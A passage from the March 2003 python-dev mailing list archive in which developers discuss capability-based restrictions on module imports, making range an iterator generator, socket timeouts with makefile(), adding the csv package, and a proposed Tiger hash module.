>>construction/invocation of A.
>>
>>I don't have a clear idea yet of how that could be implemented in a 
>>Pythonic, compatible way.
> 
> 
> Maybe, instead of there being one ultra-global namespace for importing
> modules from, it should be part of a function's environment. By
> default a function invocation would inherit the "import environment"
> of it's caller, but the caller could override this to provide a more
> restricted environment.

Inheriting things is not the capability way. Passing capabilities that 
allow imports is, of course, but isn't very Pythonic. I'm not sure 
there's a neat way to fix this that keeps both camps happy.

> This would be equivalent to passing in a set of allowable
> modules as an implicit parameter to every call.

Making it explicit would make me happy. Can you pass parameters to an 
import?

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From pedronis@bluewin.ch  Thu Mar 20 12:41:07 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Thu, 20 Mar 2003 13:41:07 +0100
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
References: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz> <3E7998F6.6010201@algroup.co.uk>
Message-ID: <003601c2eedd$fab452e0$6d94fea9@newmexico>

>
> Making it explicit would make me happy. Can you pass parameters to an
> import?
>

not directly,

an extension like

import module(parmmod=....,...)

would not seem totally unreasonable.

The problem is that normally modules are uniquely globally identified
singletons, but the very notion of parametrization implies instantiation and
that breaks the singleton part. When to instatiate a new module and when not?

a potential problem is not simply module specific global state but that the
e.g. classes exported from two instances of the same module would be _distinct_
and so not interoperable.

regards.


From ben@algroup.co.uk  Thu Mar 20 15:33:38 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Thu, 20 Mar 2003 15:33:38 +0000
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary
 for 2003-03-01 through 2003-03-15)
In-Reply-To: <003601c2eedd$fab452e0$6d94fea9@newmexico>
References: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz> <3E7998F6.6010201@algroup.co.uk> <003601c2eedd$fab452e0$6d94fea9@newmexico>
Message-ID: <3E79DF52.3020305@algroup.co.uk>

Samuele Pedroni wrote:
>>Making it explicit would make me happy. Can you pass parameters to an
>>import?
>>
> 
> 
> not directly,
> 
> an extension like
> 
> import module(parmmod=....,...)
> 
> would not seem totally unreasonable.
> 
> The problem is that normally modules are uniquely globally identified
> singletons, but the very notion of parametrization implies instantiation and
> that breaks the singleton part. When to instatiate a new module and when not?
> 
> a potential problem is not simply module specific global state but that the
> e.g. classes exported from two instances of the same module would be _distinct_
> and so not interoperable.

I don't think we'd want to change them from being singletons, just 
restrict access to them based on capabilities. So, I was more thinking 
of something like:

import(capability) module

where the capability conveys the authority to import the module. Oh. I 
see the problem: if module A imports module B, and then module A is 
imported in turn by C and D, with C having a capability to B that it 
hands to A, but D _not_ doing so, then where are we? I suppose we would 
say that the import of A into D failed in that case. Of course, this 
still leaves open the question of how we pass the authority to import 
into the module, so I guess it would look like:

import(cap1) module(cap2,cap3,...)

and cap2 etc. would have to only be used in the import statements in the 
module. And this is getting messy.

OTOH, my original idea was that the only modules a capability-enabled 
module would be allowed to import would be ones that are either 
capability-safe, or modules in the same "package" (for some definition 
of package). Any other module would have to be imported by whoever 
initialised the capability environment, and appropriate capabilities 
handed in to the capability-enabled objects. This sounds cleaner to me, 
if somewhat nebulous at the moment.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From zooko@zooko.com  Thu Mar 20 21:34:00 2003
From: zooko@zooko.com (Zooko)
Date: Thu, 20 Mar 2003 16:34:00 -0500
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
In-Reply-To: Message from Greg Ewing <greg@cosc.canterbury.ac.nz>
 of "Wed, 19 Mar 2003 11:17:55 +1200." <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz>
References: <200303182317.h2INHtF09051@oma.cosc.canterbury.ac.nz>
Message-ID: <E18w7fk-0000du-00@localhost>

 Greg Ewing <greg@cosc.canterbury.ac.nz> wrote:
>
> Maybe, instead of there being one ultra-global namespace for importing
> modules from, it should be part of a function's environment. By
> default a function invocation would inherit the "import environment"
> of it's caller, but the caller could override this to provide a more
> restricted environment.

This is a reasonable idea too.

It bears an intriguing similarity to scoping in general.  One can put 
capabilities into local variables, and then functions and classes that you 
define inside that scope automatically have access to them.  That doesn't work 
for separate modules, of course, which have no enclosing lexical scope.

So your proposal seems sort of like a kind of dynamic scoping for modules, but 
instead of the imported module having access to all variables in the scope of 
the "import" statement (the *lexical* scope of the import statement), it has 
access to specific ones -- either a special "variables accessible to imported 
modules" dict or specially flagged ones, or something.

For what it's worth, the solution to this problem in E is quite elegant.  When 
code is loaded from a module, it is executed with optional arguments.  So if 
your spam module requires a TCP socket, you can write (transliterating to Python 
syntax):

# Python with E's parameterized import
import socket
import spam(socket.socket(socket.AF_INET, socket.SOCK_STREAM))

If spam needs access to the eggs module, you could write:

import eggs
import spam(eggs)


But as Samuele Pedroni has pointed out [1] there are deeper problems here, 
namely that modules are currently singletons, which doesn't fit with the notion 
of parameterization.  It also doesn't fit with security!

Consider a module that is safe to use if you give it your credit card number, 
and safe to use if you give it a network socket, but unsafe if you give it both!

Capabilities offer this kind of security -- you can arrange it so that nobody 
else can give privileges to an object, thus allowing you to give the object 
privileges which would otherwise be dangerous.

This is easy with objects in cap-Python, but not with modules:

ttt1 = TicTacToe()
ttt1.verify_card_number(mycreditcard)

ttt2 = TicTacToe()
ttt2.connect_to_server(socket.socket(socket.AF_INET, socket.SOCK_STREAM))


So one design for cap-Python might say that only safe modules can be imported by 
cap-Python code.  Every unsafe privilege would have to be granted by using 
references (passed as arguments, assigned to variables, etc.).  No authority 
would ever be made available to capability-secured code through "import".

This might not be much of a loss, since all of the unsafe stuff that you can 
currently import -- socket, os, etc. -- is rather too coarse-grained anyway and 
will almost certainly be wrapped in a finer-grained interface before being given 
to capability-confined code.


Regards,

Zooko

http://zooko.com/
         ^-- under re-construction: some new stuff, some broken links

[1] http://mail.python.org/pipermail/python-dev/2003-March/034172.html


From dave@boost-consulting.com  Thu Mar 20 21:43:51 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Thu, 20 Mar 2003 16:43:51 -0500
Subject: [Python-Dev] Re: More int/long integration issues
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com> <200303131903.h2DJ3Ug06240@odiug.zope.com>
Message-ID: <uwuitaf3c.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

> The bytecode compiler should be clever enough to see that you're
> writing
>
>   for i in range(...): ...
>
> and that there's no definition of range other than the built-in one
> (this requires a subtle change of language rules); it can then
> substitute an internal equivalent to xrange().

Ouch!  What happens to:

       def foo(seq):
           for x in seq:
               ...

       foo(xrange(small, really_big))

if xrange dies??

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Thu Mar 20 22:33:35 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 20 Mar 2003 17:33:35 -0500
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: Your message of "Thu, 20 Mar 2003 16:43:51 EST."
 <uwuitaf3c.fsf@boost-consulting.com>
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com> <200303131903.h2DJ3Ug06240@odiug.zope.com>
 <uwuitaf3c.fsf@boost-consulting.com>
Message-ID: <200303202233.h2KMXbG07782@odiug.zope.com>

> Guido van Rossum <guido@python.org> writes:
> 
> > The bytecode compiler should be clever enough to see that you're
> > writing
> >
> >   for i in range(...): ...
> >
> > and that there's no definition of range other than the built-in one
> > (this requires a subtle change of language rules); it can then
> > substitute an internal equivalent to xrange().
> 
> Ouch!  What happens to:
> 
>        def foo(seq):
>            for x in seq:
>                ...
> 
>        foo(xrange(small, really_big))
> 
> if xrange dies??

Good point.  I guess xrange() can't die until range() becomes an
iterator (which can't be before Python 3.0).

Hm, maybe range() shouldn't be an iterator but an interator
generator.  No time to explain; see the discussion about restartable
iterators.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Thu Mar 20 22:46:36 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 20 Mar 2003 16:46:36 -0600
Subject: [Python-Dev] socket timeouts fail w/ makefile()
Message-ID: <15994.17612.495528.162817@montanaro.dyndns.org>

I discovered much to my chagrin today that the socket module's new timeout
capability doesn't play well with file objects as returned by a socket's
makefile method.  Tim O'Malley's timeoutsocket module avoids this problem by
implementing a simple file-like object directly on top of the socket without
calling makefile().  Is there some reason this approach wasn't adopted when
adding timeouts to the socket module?  I would think the greatest use of
timeouts would be using higher-level line-oriented modules like urllib and
ftplib.  In addition, since makefile() isn't always available, it seems
worthwhile to implement something in socket.py, thus making makefile()
universally available.

I filed a bug report about this issue earlier today in case people are
interested:

    http://www.python.org/sf/707074

Skip


From greg@cosc.canterbury.ac.nz  Thu Mar 20 23:16:13 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 21 Mar 2003 11:16:13 +1200 (NZST)
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
In-Reply-To: <003601c2eedd$fab452e0$6d94fea9@newmexico>
Message-ID: <200303202316.h2KNGDM07222@oma.cosc.canterbury.ac.nz>

Samuele Pedroni <pedronis@bluewin.ch>:

> The problem is that normally modules are uniquely globally identified
> singletons, but the very notion of parametrization implies instantiation and
> that breaks the singleton part.

Python already has things you can instantiate -- they're
called classes!

Seems to me if you want instantiation, you should be using
a class, not a module.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From skip@pobox.com  Thu Mar 20 23:38:54 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 20 Mar 2003 17:38:54 -0600
Subject: [Python-Dev] csv package stitched into CVS hierarchy
Message-ID: <15994.20750.356162.465058@montanaro.dyndns.org>

The csv package is now in the main branch of the CVS hierarchy.  I will
leave the structure in the sandbox for a few days before "cvs remove"ing it
in case I missed something.

Skip


From greg@cosc.canterbury.ac.nz  Thu Mar 20 23:51:06 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 21 Mar 2003 11:51:06 +1200 (NZST)
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
In-Reply-To: <E18w7fk-0000du-00@localhost>
Message-ID: <200303202351.h2KNp6707299@oma.cosc.canterbury.ac.nz>

Zooko <zooko@zooko.com>:

> So your proposal seems sort of like a kind of dynamic scoping for
> modules

Yes, it would be dynamic scoping of the import namespace.

The reason I think it needs to be dynamic rather than lexical is that
it isn't really objects or functions that we want to allow or deny
capabilities to, it's *users* (for some suitably general notion of
"user"). It may be okay for a particular method to do something when
it's called by one user, but not another.

The current method of controlling access to modules by overriding
__import__ suffers from the problem that a given module can only have
one __import__ hook at a time.  There's no way for different users of
the same module to have different importing abilities.

>From what's been said about E, it seems that the solution there is to
have instantiable modules (which means they're more like classes than
modules, in Python terms) and to explicitly pass a lot of capabilities
around.

It seems to me that you'd end up with a lot of extra parameters to
pass around in calls that way, and most of the time you'd just be
passing on what had been passed to you -- hence my suggestion of
dynamic scoping.

But, not having studied any real E code, it may be that it doesn't
turn out to be that bad in practice. Probably I shouldn't say any more
until I know what I'm talking about...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From pedronis@bluewin.ch  Thu Mar 20 23:54:21 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Fri, 21 Mar 2003 00:54:21 +0100
Subject: [Python-Dev] capability-mediated modules (was: python-dev Summary for 2003-03-01 through 2003-03-15)
References: <200303202316.h2KNGDM07222@oma.cosc.canterbury.ac.nz>
Message-ID: <024c01c2ef3c$076aa120$6d94fea9@newmexico>

> Samuele Pedroni <pedronis@bluewin.ch>:
>
> > The problem is that normally modules are uniquely globally identified
> > singletons, but the very notion of parametrization implies instantiation
and
> > that breaks the singleton part.

to makes things clearer

> Python already has things you can instantiate -- they're
> called classes!

Python already has things you can parametrize -- they're
called classes!

> Seems to me if you want instantiation, you should be using
> a class, not a module.

Seems to me if you want parametrization, you should be using
a class, not a module.

Maybe.

[ what is sometimes called a "unit" that means a parametrizable and instatiable
module can be a useful generic-programming construct. ]

the underlying questions is how much cap-Python programming can be like/we want
it like current Python programming?

for example concretely,

module and imports are often used to access "program-wide" factories. Do we
want cap-confined client code to be rewritten in order to pass the factories or
single factory-constructed objects  otherwise:

[Zooko]
>So one design for cap-Python might say that only safe modules can be imported
by
>cap-Python code.  Every unsafe privilege would have to be granted by using
>references (passed as arguments, assigned to variables, etc.).  No authority
>would ever be made available to capability-secured code through "import".

or not.

There are trade-offs in terms of necessary semantics changes/complexity vs.
language overall feeling preservation and legacy code reuse and adaptation.


From neal@metaslash.com  Fri Mar 21 00:33:40 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Thu, 20 Mar 2003 19:33:40 -0500
Subject: [Python-Dev] csv package stitched into CVS hierarchy
In-Reply-To: <15994.20750.356162.465058@montanaro.dyndns.org>
References: <15994.20750.356162.465058@montanaro.dyndns.org>
Message-ID: <20030321003340.GN14067@epoch.metaslash.com>

On Thu, Mar 20, 2003 at 05:38:54PM -0600, Skip Montanaro wrote:
> The csv package is now in the main branch of the CVS hierarchy.  I will
> leave the structure in the sandbox for a few days before "cvs remove"ing it
> in case I missed something.

Tim, can you do the magic to make sure the CSV module is in the
Windows distribution?  I think this means modifying
PCbuild/python20.wse at least.

Neal


From guido@python.org  Fri Mar 21 00:57:34 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 20 Mar 2003 19:57:34 -0500
Subject: [Python-Dev] socket timeouts fail w/ makefile()
In-Reply-To: "Your message of Thu, 20 Mar 2003 16:46:36 CST."
 <15994.17612.495528.162817@montanaro.dyndns.org>
References: <15994.17612.495528.162817@montanaro.dyndns.org>
Message-ID: <200303210057.h2L0vY608028@pcp02138704pcs.reston01.va.comcast.net>

> I discovered much to my chagrin today that the socket module's new timeout
> capability doesn't play well with file objects as returned by a socket's
> makefile method.

Can you explain better how it doesn't work?

> Tim O'Malley's timeoutsocket module avoids this problem by
> implementing a simple file-like object directly on top of the socket
> without calling makefile().  Is there some reason this approach
> wasn't adopted when adding timeouts to the socket module?

I guess nobody thought of this so far.

> I would think the greatest use of timeouts would be using
> higher-level line-oriented modules like urllib and ftplib.  In
> addition, since makefile() isn't always available, it seems
> worthwhile to implement something in socket.py, thus making
> makefile() universally available.

Um, when is makefile() not available?  There's code for Windows that
emulates it, returning a file-like object.  Maybe that code should be
enabled universally rather than only on Windows...

> I filed a bug report about this issue earlier today in case people
> are interested:
> 
>     http://www.python.org/sf/707074

I'm interested, but have no time... :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Fri Mar 21 01:39:48 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 20 Mar 2003 20:39:48 -0500
Subject: [Python-Dev] csv package stitched into CVS hierarchy
In-Reply-To: <20030321003340.GN14067@epoch.metaslash.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGELIEBAB.tim.one@comcast.net>

[Neal Norwitz]
> Tim, can you do the magic to make sure the CSV module is in the
> Windows distribution?  I think this means modifying
> PCbuild/python20.wse at least.

There's a lot of stuff that needs to be done to add a new separately
compiled module.  The good news is the same as the bad news here:  a piece
gets dropped on the floor if and only if it isn't accessed by the standard
test suite.  In this case, it looks like the test suite covers it, so be of
good cheer:  nothing will get forgotten (except for whatever pieces
test_csv.py forgets to test <wink>).


From skip@pobox.com  Fri Mar 21 03:15:45 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 20 Mar 2003 21:15:45 -0600
Subject: [Python-Dev] socket timeouts fail w/ makefile()
In-Reply-To: <200303210057.h2L0vY608028@pcp02138704pcs.reston01.va.comcast.net>
References: <15994.17612.495528.162817@montanaro.dyndns.org>
 <200303210057.h2L0vY608028@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <15994.33761.677545.551348@montanaro.dyndns.org>

    >> I discovered much to my chagrin today that the socket module's new
    >> timeout capability doesn't play well with file objects as returned by
    >> a socket's makefile method.

    Guido> Can you explain better how it doesn't work?

When the socket is in non-blocking mode, reads on the file returned by
.makefile() will fail with an IOError if there is nothing to return.

    >> I would think the greatest use of timeouts would be using
    >> higher-level line-oriented modules like urllib and ftplib.  In
    >> addition, since makefile() isn't always available, it seems
    >> worthwhile to implement something in socket.py, thus making
    >> makefile() universally available.

    Guido> Um, when is makefile() not available?  

I don't know.  I was going by the doc string in socketmodule.c which says,
in part:

    ...
    makefile([mode, [bufsize]]) -- return a file object for the socket [*]\n\
    ...
     [*] not available on all platforms!");

Maybe the docs are just wrong.  According to the #ifdef in the code, if
NO_DUP is defined (OS/2, Windows, BeOS), makefile() isn't.

    Guido> There's code for Windows that emulates it, returning a file-like
    Guido> object.  Maybe that code should be enabled universally rather
    Guido> than only on Windows...

That sounds similar to what is in timeoutsocket.py.  It would have the
advantage of providing identical semantics across all platforms.

Skip


From guido@python.org  Fri Mar 21 11:17:29 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 21 Mar 2003 06:17:29 -0500
Subject: [Python-Dev] socket timeouts fail w/ makefile()
In-Reply-To: "Your message of Thu, 20 Mar 2003 21:15:45 CST."
 <15994.33761.677545.551348@montanaro.dyndns.org>
References: <15994.17612.495528.162817@montanaro.dyndns.org>
 <200303210057.h2L0vY608028@pcp02138704pcs.reston01.va.comcast.net>
 <15994.33761.677545.551348@montanaro.dyndns.org>
Message-ID: <200303211117.h2LBHTh23630@pcp02138704pcs.reston01.va.comcast.net>

>     >> I discovered much to my chagrin today that the socket
>     >> module's new timeout capability doesn't play well with file
>     >> objects as returned by a socket's makefile method.
> 
>     Guido> Can you explain better how it doesn't work?
> 
> When the socket is in non-blocking mode, reads on the file returned by
> .makefile() will fail with an IOError if there is nothing to return.

Isn't that exactly what a timeout is supposed to do?  What would you
have expected?

>     >> I would think the greatest use of timeouts would be using
>     >> higher-level line-oriented modules like urllib and ftplib.  In
>     >> addition, since makefile() isn't always available, it seems
>     >> worthwhile to implement something in socket.py, thus making
>     >> makefile() universally available.
> 
>     Guido> Um, when is makefile() not available?  
> 
> I don't know.  I was going by the doc string in socketmodule.c which
> says, in part:
> 
>     ...
>     makefile([mode, [bufsize]]) -- return a file object for the socket [*]\n\
>     ...
>      [*] not available on all platforms!");
> 
> Maybe the docs are just wrong.  According to the #ifdef in the code, if
> NO_DUP is defined (OS/2, Windows, BeOS), makefile() isn't.

That's the docs for the _socket module, which is (nowadays) an
implementation detail.  Read socket.py instead.

>     Guido> There's code for Windows that emulates it, returning a
>     Guido> file-like object.  Maybe that code should be enabled
>     Guido> universally rather than only on Windows...
> 
> That sounds similar to what is in timeoutsocket.py.  It would have the
> advantage of providing identical semantics across all platforms.

Again, I won't have time to do this until after I'm back from Python
UK, so I'd appreciate it if someone helped with this, e.g. by filing a
patch.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Fri Mar 21 12:28:39 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 21 Mar 2003 06:28:39 -0600
Subject: [Python-Dev] socket timeouts fail w/ makefile()
In-Reply-To: <200303211117.h2LBHTh23630@pcp02138704pcs.reston01.va.comcast.net>
References: <15994.17612.495528.162817@montanaro.dyndns.org>
 <200303210057.h2L0vY608028@pcp02138704pcs.reston01.va.comcast.net>
 <15994.33761.677545.551348@montanaro.dyndns.org>
 <200303211117.h2LBHTh23630@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <15995.1399.226407.866954@montanaro.dyndns.org>

    >> When the socket is in non-blocking mode, reads on the file returned
    >> by .makefile() will fail with an IOError if there is nothing to
    >> return.

    Guido> Isn't that exactly what a timeout is supposed to do?  What would
    Guido> you have expected?

Sorry, I wasn't clear.  It fails immediately.  The timeout isn't observed. 

    >> makefile([mode, [bufsize]]) -- return a file object for the socket [*]\n\
    >> ...
    >> [*] not available on all platforms!");

    Guido> That's the docs for the _socket module, which is (nowadays) an
    Guido> implementation detail.  Read socket.py instead.

Maybe _socket shouldn't have such a detailed doc string or should indicate
its subservient relationship to socket?  I was reading it as if it was a
comment in the code, which, in theory, should still be accurate.

    Guido> Again, I won't have time to do this until after I'm back from
    Guido> Python UK, so I'd appreciate it if someone helped with this,
    Guido> e.g. by filing a patch.

I'll take a look.  There's a bug already in the system
(http://www.python.org/sf/707074) to which a patch could be applied, so if
someone comes up with something, that's where it goes.

Skip


From dave@boost-consulting.com  Fri Mar 21 14:43:36 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Fri, 21 Mar 2003 09:43:36 -0500
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: <200303202233.h2KMXbG07782@odiug.zope.com> (Guido van Rossum's
 message of "Thu, 20 Mar 2003 17:33:35 -0500")
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>
 <200303131903.h2DJ3Ug06240@odiug.zope.com>
 <uwuitaf3c.fsf@boost-consulting.com>
 <200303202233.h2KMXbG07782@odiug.zope.com>
Message-ID: <uznnowzjb.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

>> Guido van Rossum <guido@python.org> writes:
>> 
>> > The bytecode compiler should be clever enough to see that you're
>> > writing
>> >
>> >   for i in range(...): ...
>> >
>> > and that there's no definition of range other than the built-in one
>> > (this requires a subtle change of language rules); it can then
>> > substitute an internal equivalent to xrange().
>> 
>> Ouch!  What happens to:
>> 
>>        def foo(seq):
>>            for x in seq:
>>                ...
>> 
>>        foo(xrange(small, really_big))
>> 
>> if xrange dies??
>
> Good point.  I guess xrange() can't die until range() becomes an
> iterator (which can't be before Python 3.0).
>
> Hm, maybe range() shouldn't be an iterator but an interator
> generator.  No time to explain; see the discussion about restartable
> iterators.

I think what you mean is fairly obvious.  list et al. are iterator
generators, right?  It's just a thing with an __iter__ function which
produces an iterator?

If so, I tend to agree that's the right behavior for range().
range(x,y,z) should be an immutable object.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Fri Mar 21 14:55:16 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 21 Mar 2003 09:55:16 -0500
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: "Your message of Fri, 21 Mar 2003 09:43:36 EST."
 <uznnowzjb.fsf@boost-consulting.com>
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>
 <200303131903.h2DJ3Ug06240@odiug.zope.com>
 <uwuitaf3c.fsf@boost-consulting.com>
 <200303202233.h2KMXbG07782@odiug.zope.com> <uznnowzjb.fsf@boost-consulting.com>
Message-ID: <200303211455.h2LEtGp24202@pcp02138704pcs.reston01.va.comcast.net>

> > Hm, maybe range() shouldn't be an iterator but an interator
> > generator.  No time to explain; see the discussion about restartable
> > iterators.
> 
> I think what you mean is fairly obvious.  list et al. are iterator
> generators, right?  It's just a thing with an __iter__ function which
> produces an iterator?
> 
> If so, I tend to agree that's the right behavior for range().
> range(x,y,z) should be an immutable object.

Yes.  Idioms like this are used fairly often:

  seq = range(...)

  for i in seq: ...
  for i in seq: ...
  # etc.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Fri Mar 21 17:53:03 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 21 Mar 2003 11:53:03 -0600
Subject: [Python-Dev] socket timeouts fail w/ makefile()
Message-ID: <15995.20863.424664.1587@montanaro.dyndns.org>

    Guido> Again, I won't have time to do this until after I'm back from
    Guido> Python UK, so I'd appreciate it if someone helped with this,
    Guido> e.g. by filing a patch.

    Skip> I'll take a look.

I attached a patch to http://www.python.org/sf/707074 which makes the socket
wrapper unconditional, and added a new test case (test_urllibnet.py -
requires the 'network' resource) which fails before applying the patch and
succeeds afterward.  Would someone else like to take a look at it?  Guido's
the natural candidate, but is busy with near-term conferences.

Thx,

Skip


From Tino.Lange@isg.de  Fri Mar 21 19:15:20 2003
From: Tino.Lange@isg.de (Tino Lange)
Date: Fri, 21 Mar 2003 20:15:20 +0100
Subject: [Python-Dev] New Module? Tiger Hashsum
Message-ID: <3E7B64C8.F3302144@isg.de>

Hi!

Today I suddenly needed the tiger hashsums from python - it's not
included in the standard distribution and I couldn't find it somewhere.
So I thought that's it's maybe time again to contribute :-)

It was a quite straight forward task to write a wrapper that is able to
calculate such hash-sums from Python, besides the tiger.c/tiger.h it's
only a few lines of code. It runs perfect under Linux with distutils - I
guess someone who knows windows better has to look for a windows port
beacuse of the 'long long' integers (shouldn't be too hard) ...

But at least for me it's really useful:

> >>> import tiger
> >>> tiger.tiger("Python is cool... And now it can even calculate tiger hashsums!")
> (135509944, 135510340, 135510352, 135509920, 135510016, 135197188)
> >>> tiger.__doc__
> 'This module gives you access to the fast, cryptographic tiger hash function from Eli Biham, see http://www.cs.technion.ac.il/~biham/Reports/Tiger/ for details.'
> >>> tiger.tiger.__doc__
> 'tiger(string) -> (int, int, int, int, int, int) -- compute a 192 bit hash-sum of given string (which can contain zero characters)'

Are you interested to get the code, maybe for the next release? Shall I
send it to someone of you developers? Or upload somewhere to your
project page? Or just send it here as attachment?

Just let me know.
Best regards!

Tino


From skip@pobox.com  Fri Mar 21 19:36:13 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 21 Mar 2003 13:36:13 -0600
Subject: [Python-Dev] New Module? Tiger Hashsum
In-Reply-To: <3E7B64C8.F3302144@isg.de>
References: <3E7B64C8.F3302144@isg.de>
Message-ID: <15995.27053.118634.347706@montanaro.dyndns.org>

    Tino> I guess someone who knows windows better has to look for a windows
    Tino> port beacuse of the 'long long' integers (shouldn't be too hard)
    Tino> ...

The LONG_LONG macro is defined in Python's Include/pyport.h file.  Just use
it instead of 'long long'.  On Windows I think 'long long' is spelled
'__int64'.

Skip


From Tino.Lange@isg.de  Fri Mar 21 20:02:31 2003
From: Tino.Lange@isg.de (Tino Lange)
Date: Fri, 21 Mar 2003 21:02:31 +0100
Subject: [Python-Dev] New Module? Tiger Hashsum
References: <3E7B64C8.F3302144@isg.de> <15995.27053.118634.347706@montanaro.dyndns.org>
Message-ID: <3E7B6FD7.193B1981@isg.de>

Skip,

Ah, great!
Thank you! I'll try that tomorrow with MSVC 6.

Cheers,

Tino

----------

Skip Montanaro wrote:
> 
>     Tino> I guess someone who knows windows better has to look for a windows
>     Tino> port beacuse of the 'long long' integers (shouldn't be too hard)
>     Tino> ...
> 
> The LONG_LONG macro is defined in Python's Include/pyport.h file.  Just use
> it instead of 'long long'.  On Windows I think 'long long' is spelled
> '__int64'.
> 
> Skip


From martin@v.loewis.de  Fri Mar 21 22:11:12 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 21 Mar 2003 23:11:12 +0100
Subject: [Python-Dev] New Module? Tiger Hashsum
In-Reply-To: <3E7B64C8.F3302144@isg.de>
References: <3E7B64C8.F3302144@isg.de>
Message-ID: <m3n0jogykf.fsf@mira.informatik.hu-berlin.de>

Tino Lange <Tino.Lange@isg.de> writes:

> Are you interested to get the code, maybe for the next release? Shall I
> send it to someone of you developers? Or upload somewhere to your
> project page? Or just send it here as attachment?

Dear Tino,

We are usually reluctant to add modules to the Python core
distribution, until there is some user community interested in that
module. Until then, I recommend you submit your module to the Vaults
of Parnassus, and announce it to comp.lang.python.announce.

Regards,
Martin


From cnetzer@mail.arc.nasa.gov  Fri Mar 21 22:42:07 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 21 Mar 2003 14:42:07 -0800
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: <200303211455.h2LEtGp24202@pcp02138704pcs.reston01.va.comcast.net>
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>
 <200303131903.h2DJ3Ug06240@odiug.zope.com>
 <uwuitaf3c.fsf@boost-consulting.com>
 <200303202233.h2KMXbG07782@odiug.zope.com>
 <uznnowzjb.fsf@boost-consulting.com>
 <200303211455.h2LEtGp24202@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1048286527.651.29.camel@sayge.arc.nasa.gov>

On Fri, 2003-03-21 at 06:55, Guido van Rossum wrote:

> > > Hm, maybe range() shouldn't be an iterator but an interator
> > > generator.  No time to explain; see the discussion about restartable
> > > iterators.

Hmmm. Now that've uploaded my patch extending range() to longs, I'd like
to work on this.  I've already written a C range() iterator
(incorporating PyLongs), and it would be very nice to have it
automatically be a lazy range() when used in a loop.

In any case, assuming you are quite busy, but would consider this for
the 2.4 timeframe, I will do some work on it. If it is already being
covered, I'll gladly stay away from it. :)

-- 
Bay Area Python Interest Group - http://www.baypiggies.net/

Chad Netzer
(any opinion expressed is my own and not NASA's or my employer's)


From Tino.Lange@isg.de  Sat Mar 22 08:42:20 2003
From: Tino.Lange@isg.de (Tino Lange)
Date: Sat, 22 Mar 2003 09:42:20 +0100
Subject: [Python-Dev] Icon for Python RSS Feed?
Message-ID: <3E7C21EC.1A5BD79@isg.de>

Hi!

Can you add an nice icon for the news XML RDF resource
http://www.python.org/channews.rdf
for example in http://www.python.org/favicon.ico? I think this is the
standard location - at least for my KNewsTicker. Then your news will be
